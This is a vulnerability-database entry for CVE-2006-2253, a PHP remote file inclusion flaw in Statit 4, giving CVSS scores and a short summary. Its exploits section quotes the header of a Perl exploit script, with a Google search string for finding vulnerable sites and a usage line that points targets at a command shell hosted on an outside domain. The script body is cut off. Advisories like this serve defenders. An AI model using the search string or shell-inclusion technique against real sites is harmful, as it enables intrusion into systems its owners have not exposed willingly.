7.5
CVSSv2

CVE-2006-2253

Published: 09/05/2006 Updated: 19/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in visible_count_inc.php in Statit 4 (060207) allows remote malicious users to execute arbitrary PHP code via a URL in the statitpath parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

otterware statit 4_2006-02-07

Exploits

#!/usr/bin/perl ## # Statit V4 Remote File Inclusion exploit # Bug discovered By IGNOR3 # IGNOR3_llvlle@yahoocom # wwwsmart-boyscom # Google Search=inurl:statitphp # usage: # perl statitpl <target> <cmd shell location> <cmd shell variable> # perl statitpl targetcom/statit/ wwwgolhanet/ignor3/shelltxt ...